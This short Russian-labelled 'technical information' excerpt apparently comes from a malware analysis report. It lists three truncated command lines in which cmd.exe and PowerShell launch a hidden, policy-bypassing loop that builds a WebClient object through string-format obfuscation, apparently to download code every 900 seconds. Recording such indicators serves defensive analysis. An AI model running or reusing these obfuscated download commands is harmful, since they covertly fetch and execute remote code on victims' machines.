Техническая информация
- '<SYSTEM32>\cmd.exe' /c"poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 900;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('...
- '<SYSTEM32>\cmd.exe' /c"poweRSheLL -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 900;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoniNTeRaCtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 900;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadf...